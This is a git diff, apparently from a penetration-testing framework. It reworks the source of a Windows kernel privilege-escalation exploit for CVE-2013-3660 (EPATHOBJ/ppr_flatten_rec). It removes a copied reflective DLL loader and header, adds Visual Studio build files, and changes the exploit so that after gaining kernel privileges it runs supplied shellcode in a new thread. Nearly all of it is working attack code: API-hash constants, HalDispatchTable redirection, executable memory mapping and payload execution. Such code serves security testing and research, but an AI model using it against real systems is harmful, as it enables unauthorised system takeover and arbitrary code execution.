- {
- // get the VA of this functions import by name struct
- uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
-
- // use GetProcAddress and patch in the address for this imported function
- DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
- }
- // get the next imported function
- uiValueA += sizeof( ULONG_PTR );
- if( uiValueD )
- uiValueD += sizeof( ULONG_PTR );
- }
-
- // get the next import
- uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
- }
-
- // STEP 5: process all of our images relocations...
-
- // calculate the base address delta and perform relocations (even if we load at desired image base)
- uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
-
- // uiValueB = the address of the relocation directory
- uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
-
- // check if their are any relocations present
- if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
- {
- // uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
- uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
-
- // and we itterate through all entries...
- while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
- {
- // uiValueA = the VA for this relocation block
- uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
-
- // uiValueB = number of entries in this relocation block
- uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
-
- // uiValueD is now the first entry in the current relocation block
- uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
-
- // we itterate through all the entries in the current block...
- while( uiValueB-- )
- {
- // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
- // we dont use a switch statement to avoid the compiler building a jump table
- // which would not be very position independent!
- if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
- *(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
- else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
- *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
-#ifdef WIN_ARM
- // Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem.
- else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T )
- {
- register DWORD dwInstruction;
- register DWORD dwAddress;
- register WORD wImm;
- // get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word)
- dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) );
- // flip the words to get the instruction as expected
- dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
- // sanity chack we are processing a MOV instruction...
- if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT )
- {
- // pull out the encoded 16bit value (the high portion of the address-to-relocate)
- wImm = (WORD)( dwInstruction & 0x000000FF);
- wImm |= (WORD)((dwInstruction & 0x00007000) >> 4);
- wImm |= (WORD)((dwInstruction & 0x04000000) >> 15);
- wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4);
- // apply the relocation to the target address
- dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF;
- // now create a new instruction with the same opcode and register param.
- dwInstruction = (DWORD)( dwInstruction & ARM_MOV_MASK2 );
- // patch in the relocated address...
- dwInstruction |= (DWORD)(dwAddress & 0x00FF);
- dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4;
- dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15;
- dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4;
- // now flip the instructions words and patch back into the code...
- *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
- }
- }
-#endif
- else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
- *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
- else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
- *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
-
- // get the next entry in the current relocation block
- uiValueD += sizeof( IMAGE_RELOC );
- }
-
- // get the next entry in the relocation directory
- uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
- }
- }
-
- // STEP 6: call our images entry point
-
- // uiValueA = the VA of our newly loaded DLL/EXE's entry point
- uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
-
- // We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
- pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 );
-
- // call our respective entry point, fudging our hInstance value
-#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
- // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
- ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
-#else
- // if we are injecting an DLL via a stub we call DllMain with no parameter
- ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
-#endif
-
- // STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
- return uiValueA;
-}
-//===============================================================================================//
-#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
-
-BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
-{
- BOOL bReturnValue = TRUE;
- switch( dwReason )
- {
- case DLL_QUERY_HMODULE:
- if( lpReserved != NULL )
- *(HMODULE *)lpReserved = hAppInstance;
- break;
- case DLL_PROCESS_ATTACH:
- hAppInstance = hinstDLL;
- break;
- case DLL_PROCESS_DETACH:
- case DLL_THREAD_ATTACH:
- case DLL_THREAD_DETACH:
- break;
- }
- return bReturnValue;
-}
-
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.h b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.h
deleted file mode 100755
index b8eb22b0b1..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.h
+++ /dev/null
@@ -1,202 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
-#define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include
-#include
-#include
-#include "ReflectiveDLLInjection.h"
-
-typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
-typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
-typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
-typedef DWORD (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
-
-#define KERNEL32DLL_HASH 0x6A4ABC5B
-#define NTDLLDLL_HASH 0x3CFA685D
-
-#define LOADLIBRARYA_HASH 0xEC0E4E8E
-#define GETPROCADDRESS_HASH 0x7C0DFCAA
-#define VIRTUALALLOC_HASH 0x91AFCA54
-#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8
-
-#define IMAGE_REL_BASED_ARM_MOV32A 5
-#define IMAGE_REL_BASED_ARM_MOV32T 7
-
-#define ARM_MOV_MASK (DWORD)(0xFBF08000)
-#define ARM_MOV_MASK2 (DWORD)(0xFBF08F00)
-#define ARM_MOVW 0xF2400000
-#define ARM_MOVT 0xF2C00000
-
-#define HASH_KEY 13
-//===============================================================================================//
-#pragma intrinsic( _rotr )
-
-__forceinline DWORD ror( DWORD d )
-{
- return _rotr( d, HASH_KEY );
-}
-
-__forceinline DWORD hash( char * c )
-{
- register DWORD h = 0;
- do
- {
- h = ror( h );
- h += *c;
- } while( *++c );
-
- return h;
-}
-//===============================================================================================//
-typedef struct _UNICODE_STR
-{
- USHORT Length;
- USHORT MaximumLength;
- PWSTR pBuffer;
-} UNICODE_STR, *PUNICODE_STR;
-
-// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
-//__declspec( align(8) )
-typedef struct _LDR_DATA_TABLE_ENTRY
-{
- //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
- LIST_ENTRY InMemoryOrderModuleList;
- LIST_ENTRY InInitializationOrderModuleList;
- PVOID DllBase;
- PVOID EntryPoint;
- ULONG SizeOfImage;
- UNICODE_STR FullDllName;
- UNICODE_STR BaseDllName;
- ULONG Flags;
- SHORT LoadCount;
- SHORT TlsIndex;
- LIST_ENTRY HashTableEntry;
- ULONG TimeDateStamp;
-} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
-
-// WinDbg> dt -v ntdll!_PEB_LDR_DATA
-typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
-{
- DWORD dwLength;
- DWORD dwInitialized;
- LPVOID lpSsHandle;
- LIST_ENTRY InLoadOrderModuleList;
- LIST_ENTRY InMemoryOrderModuleList;
- LIST_ENTRY InInitializationOrderModuleList;
- LPVOID lpEntryInProgress;
-} PEB_LDR_DATA, * PPEB_LDR_DATA;
-
-// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
-typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
-{
- struct _PEB_FREE_BLOCK * pNext;
- DWORD dwSize;
-} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
-
-// struct _PEB is defined in Winternl.h but it is incomplete
-// WinDbg> dt -v ntdll!_PEB
-typedef struct __PEB // 65 elements, 0x210 bytes
-{
- BYTE bInheritedAddressSpace;
- BYTE bReadImageFileExecOptions;
- BYTE bBeingDebugged;
- BYTE bSpareBool;
- LPVOID lpMutant;
- LPVOID lpImageBaseAddress;
- PPEB_LDR_DATA pLdr;
- LPVOID lpProcessParameters;
- LPVOID lpSubSystemData;
- LPVOID lpProcessHeap;
- PRTL_CRITICAL_SECTION pFastPebLock;
- LPVOID lpFastPebLockRoutine;
- LPVOID lpFastPebUnlockRoutine;
- DWORD dwEnvironmentUpdateCount;
- LPVOID lpKernelCallbackTable;
- DWORD dwSystemReserved;
- DWORD dwAtlThunkSListPtr32;
- PPEB_FREE_BLOCK pFreeList;
- DWORD dwTlsExpansionCounter;
- LPVOID lpTlsBitmap;
- DWORD dwTlsBitmapBits[2];
- LPVOID lpReadOnlySharedMemoryBase;
- LPVOID lpReadOnlySharedMemoryHeap;
- LPVOID lpReadOnlyStaticServerData;
- LPVOID lpAnsiCodePageData;
- LPVOID lpOemCodePageData;
- LPVOID lpUnicodeCaseTableData;
- DWORD dwNumberOfProcessors;
- DWORD dwNtGlobalFlag;
- LARGE_INTEGER liCriticalSectionTimeout;
- DWORD dwHeapSegmentReserve;
- DWORD dwHeapSegmentCommit;
- DWORD dwHeapDeCommitTotalFreeThreshold;
- DWORD dwHeapDeCommitFreeBlockThreshold;
- DWORD dwNumberOfHeaps;
- DWORD dwMaximumNumberOfHeaps;
- LPVOID lpProcessHeaps;
- LPVOID lpGdiSharedHandleTable;
- LPVOID lpProcessStarterHelper;
- DWORD dwGdiDCAttributeList;
- LPVOID lpLoaderLock;
- DWORD dwOSMajorVersion;
- DWORD dwOSMinorVersion;
- WORD wOSBuildNumber;
- WORD wOSCSDVersion;
- DWORD dwOSPlatformId;
- DWORD dwImageSubsystem;
- DWORD dwImageSubsystemMajorVersion;
- DWORD dwImageSubsystemMinorVersion;
- DWORD dwImageProcessAffinityMask;
- DWORD dwGdiHandleBuffer[34];
- LPVOID lpPostProcessInitRoutine;
- LPVOID lpTlsExpansionBitmap;
- DWORD dwTlsExpansionBitmapBits[32];
- DWORD dwSessionId;
- ULARGE_INTEGER liAppCompatFlags;
- ULARGE_INTEGER liAppCompatFlagsUser;
- LPVOID lppShimData;
- LPVOID lpAppCompatInfo;
- UNICODE_STR usCSDVersion;
- LPVOID lpActivationContextData;
- LPVOID lpProcessAssemblyStorageMap;
- LPVOID lpSystemDefaultActivationContextData;
- LPVOID lpSystemAssemblyStorageMap;
- DWORD dwMinimumStackCommit;
-} _PEB, * _PPEB;
-
-typedef struct
-{
- WORD offset:12;
- WORD type:4;
-} IMAGE_RELOC, *PIMAGE_RELOC;
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/make.msbuild b/external/source/exploits/cve-2013-3660/make.msbuild
new file mode 100755
index 0000000000..e620eef70f
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/make.msbuild
@@ -0,0 +1,18 @@
+
+
+
+ .\ppr_flatten_rec.sln
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/external/source/exploits/cve-2013-3660/ppr_flatten_rec.sln b/external/source/exploits/cve-2013-3660/ppr_flatten_rec.sln
new file mode 100755
index 0000000000..b01875c989
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/ppr_flatten_rec.sln
@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ppr_flatten_rec", "ppr_flatten_rec\ppr_flatten_rec.vcxproj", "{942BF20A-E438-48B0-A614-A6E0CC2E94BD}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Win32 = Debug|Win32
+ Release|Win32 = Release|Win32
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Debug|Win32.ActiveCfg = Debug|Win32
+ {942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Debug|Win32.Build.0 = Debug|Win32
+ {942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Release|Win32.ActiveCfg = Release|Win32
+ {942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Release|Win32.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ComplexPath.h b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ComplexPath.h
similarity index 96%
rename from external/source/exploits/cve-2013-3660/dll/src/ComplexPath.h
rename to external/source/exploits/cve-2013-3660/ppr_flatten_rec/ComplexPath.h
index 11c4134bb4..505d9961d2 100755
--- a/external/source/exploits/cve-2013-3660/dll/src/ComplexPath.h
+++ b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ComplexPath.h
@@ -418,19 +418,10 @@
# define WIN32_NO_STATUS
#endif
#include
-#include
-#include
-#include
-#include
#ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS
#endif
-#include
-#pragma comment(lib, "gdi32")
-#pragma comment(lib, "kernel32")
-#pragma comment(lib, "user32")
-#pragma comment(lib, "shell32")
#pragma comment(linker, "/SECTION:.text,ERW")
#ifndef PAGE_SIZE
@@ -448,11 +439,6 @@ static ULONG ComplexPathNumRegion = 0;
static HANDLE Mutex;
static DWORD ComplexPathFinished = 0;
-// Log levels.
-typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
-
-BOOL LogMessage(LEVEL Level, PCHAR Format, ...);
-
// Copied from winddi.h from the DDK
#define PD_BEGINSUBPATH 0x00000001
#define PD_ENDSUBPATH 0x00000002
@@ -509,21 +495,24 @@ ULONG HalQuerySystemInformation;
PULONG TargetPid;
PVOID *PsInitialSystemProcess;
-VOID elevator_complex_path();
+//#define DEBUGTRACE 1
-//#define DEBUGTRACE 1
-
-#ifdef DEBUGTRACE
-#define dprintf(...) real_dprintf(__VA_ARGS__)
-#else
-#define dprintf(...) do{}while(0);
-#endif
-
-static void real_dprintf(char *format, ...) {
- va_list args;
- char buffer[1024];
- va_start(args,format);
- vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args);
- strcat_s(buffer, sizeof(buffer), "\r\n");
- OutputDebugStringA(buffer);
-}
\ No newline at end of file
+// Log levels.
+typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
+
+#ifdef DEBUGTRACE
+VOID LogMessage(LEVEL Level, PCHAR Format, ...);
+
+#define dprintf(...) real_dprintf(__VA_ARGS__)
+static void real_dprintf(char *format, ...) {
+ va_list args;
+ char buffer[1024];
+ va_start(args,format);
+ vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args);
+ strcat_s(buffer, sizeof(buffer), "\r\n");
+ OutputDebugStringA(buffer);
+}
+#else
+#define dprintf(...)
+#define LogMessage(...)
+#endif
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.c
similarity index 90%
rename from external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
rename to external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.c
index 547fd1fd85..f4776eb046 100755
--- a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
+++ b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.c
@@ -1,15 +1,15 @@
//===============================================================================================//
-// This is a stub for the actuall functionality of the DLL.
+// This is a stub for the actual functionality of the DLL.
//===============================================================================================//
-// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are
-// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own
-// DllMain and use the LoadRemoteLibraryR() API to inject this DLL.
-//===============================================================================================//
-
-#include "ReflectiveLoader.h"
+#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include "ComplexPath.h"
+// Purloined from ntstatus.h
+#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
+
//
// --------------------------------------------------
// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
@@ -550,7 +550,20 @@ VOID __declspec(naked) HalDispatchRedirect(VOID)
}
}
-VOID elevator_complex_path()
+/*!
+ * @brief Helper thread function which runs the given payload directly.
+ * @param lpPayload The payload shellcode to execute.
+ * @returns \c ERROR_SUCCESS
+ */
+DWORD WINAPI execute_payload(LPVOID lpPayload)
+{
+ LogMessage(L_INFO, "[PPRFLATTENREC] Payload thread started.");
+ VOID(*lpCode)() = (VOID(*)())lpPayload;
+ lpCode();
+ return ERROR_SUCCESS;
+}
+
+VOID elevator_complex_path(LPVOID lpPayload)
{
HANDLE Thread;
HDC Device;
@@ -566,6 +579,12 @@ VOID elevator_complex_path()
"\rWindows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit\n"
"\r------------------- taviso@cmpxchg8b.com, programmeboy@gmail.com ---\n"
"\n");
+
+ if (lpPayload == NULL) {
+ LogMessage(L_ERROR, "[PRFLATTENREC] payload argument not specified");
+ return;
+ }
+
NtQueryIntervalProfile = GetProcAddress(GetModuleHandle("ntdll"), "NtQueryIntervalProfile");
NtQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll"), "NtQuerySystemInformation");
Mutex = CreateMutex(NULL, FALSE, NULL);
@@ -590,10 +609,10 @@ VOID elevator_complex_path()
// Lookup some system routines we require.
KernelHandle = LoadLibrary(ModuleInfo.Modules[0].FullPathName + ModuleInfo.Modules[0].OffsetToFileName);
- HalDispatchTable = (ULONG) GetProcAddress(KernelHandle, "HalDispatchTable") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
- PsInitialSystemProcess = (ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
- PsReferencePrimaryToken = (ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
- PsLookupProcessByProcessId = (ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
+ HalDispatchTable = (PULONG)((ULONG) GetProcAddress(KernelHandle, "HalDispatchTable") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
+ PsInitialSystemProcess = (PVOID*)((ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
+ PsReferencePrimaryToken = (FARPROC)((ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
+ PsLookupProcessByProcessId = (FARPROC)((ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
// Search for a ret instruction to install in the damaged HalDispatchTable.
HalQuerySystemInformation = (ULONG) memchr(KernelHandle, 0xC3, ModuleInfo.Modules[0].ImageSize)
@@ -629,7 +648,7 @@ VOID elevator_complex_path()
// I need to map at least two pages to guarantee the whole structure is
// available.
- while (!VirtualAlloc(*DispatchRedirect & ~(PAGE_SIZE - 1),
+ while (!VirtualAlloc((LPVOID)(*DispatchRedirect & ~(PAGE_SIZE - 1)),
PAGE_SIZE * 2,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE)) {
@@ -740,7 +759,7 @@ VOID elevator_complex_path()
if (ComplexPathFinished) {
LogMessage(L_INFO, "Success...", ComplexPathFinished);
- //ExitProcess(0);
+ CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);
return;
}
@@ -756,7 +775,8 @@ VOID elevator_complex_path()
}
// A quick logging routine for debug messages.
-BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
+#ifdef DEBUGTRACE
+VOID LogMessage(LEVEL Level, PCHAR Format, ...)
{
CHAR Buffer[1024] = {0};
va_list Args;
@@ -774,28 +794,34 @@ BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
//fflush(stdout);
//flush(stderr);
-
- return TRUE;
}
-extern HINSTANCE hAppInstance;
-BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
+#else
+#define LogMessage(...)
+#endif
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
- BOOL bReturnValue = TRUE;
- switch( dwReason )
- {
- case DLL_QUERY_HMODULE:
- if( lpReserved != NULL )
- *(HMODULE *)lpReserved = hAppInstance;
- hAppInstance = hinstDLL;
- elevator_complex_path();
- break;
- case DLL_PROCESS_ATTACH:
- hAppInstance = hinstDLL;
- break;
- case DLL_PROCESS_DETACH:
- case DLL_THREAD_ATTACH:
- case DLL_THREAD_DETACH:
- break;
- }
+ BOOL bReturnValue = TRUE;
+ dprintf("[PPRFLATTENREC] DllMain invoked, reason: %u", dwReason);
+ switch (dwReason)
+ {
+ case DLL_QUERY_HMODULE:
+ hAppInstance = hinstDLL;
+ dprintf("[PPRFLATTENREC] Module queried %x", hinstDLL);
+ if (lpReserved != NULL)
+ {
+ *(HMODULE *)lpReserved = hAppInstance;
+ }
+ break;
+ case DLL_PROCESS_ATTACH:
+ hAppInstance = hinstDLL;
+ dprintf("[PPRFLATTENREC] Launching exploit with %p", lpReserved);
+ elevator_complex_path(lpReserved);
+ break;
+ case DLL_PROCESS_DETACH:
+ case DLL_THREAD_ATTACH:
+ case DLL_THREAD_DETACH:
+ break;
+ }
return bReturnValue;
}
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj
new file mode 100755
index 0000000000..6368dc6a25
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj
@@ -0,0 +1,141 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+
+ {942BF20A-E438-48B0-A614-A6E0CC2E94BD}
+ ppr_flatten_rec
+ Win32Proj
+
+
+
+ DynamicLibrary
+ MultiByte
+ false
+ v120_xp
+
+
+ DynamicLibrary
+ MultiByte
+ v120_xp
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ $(Configuration)\$(Platform)\
+ $(Configuration)\$(Platform)\
+ false
+ false
+ AllRules.ruleset
+
+
+ $(ProjectName).$(PlatformShortName)
+
+
+
+ Disabled
+ ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;PPR_FLATTEN_REC_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDebug
+
+
+ Level3
+
+
+ Mpr.lib;%(AdditionalDependencies)
+ %(AdditionalLibraryDirectories)
+ %(DelayLoadDLLs)
+ true
+ Windows
+ MachineX86
+
+
+ /ignore:4070
+
+
+ editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
+
+
+ _DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)
+
+
+
+
+ MinSpace
+ OnlyExplicitInline
+ false
+ ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;PPR_FLATTEN_REC_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ $(OutDir)\
+ $(OutDir)\
+ $(OutDir)\
+ Level3
+ ProgramDatabase
+ false
+ Size
+
+
+ Mpr.lib;%(AdditionalDependencies)
+ %(AdditionalLibraryDirectories)
+ false
+ %(IgnoreSpecificDefaultLibraries)
+ %(DelayLoadDLLs)
+ false
+ true
+ $(OutDir)\ppr_flatten_rec.map
+ Windows
+
+
+
+
+ false
+
+
+ $(OutDir)\ppr_flatten_rec.lib
+ MachineX86
+ false
+
+
+ /ignore:4070
+
+
+ editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
+IF EXIST "..\..\..\..\..\data\exploits\CVE-2013-3660\" GOTO COPY
+ mkdir "..\..\..\..\..\data\exploits\CVE-2013-3660\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2013-3660\"
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj.filters b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj.filters
new file mode 100755
index 0000000000..15ae50dd2e
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj.filters
@@ -0,0 +1,9 @@
+
+
+
+
+
+
+
+
+
\ No newline at end of file
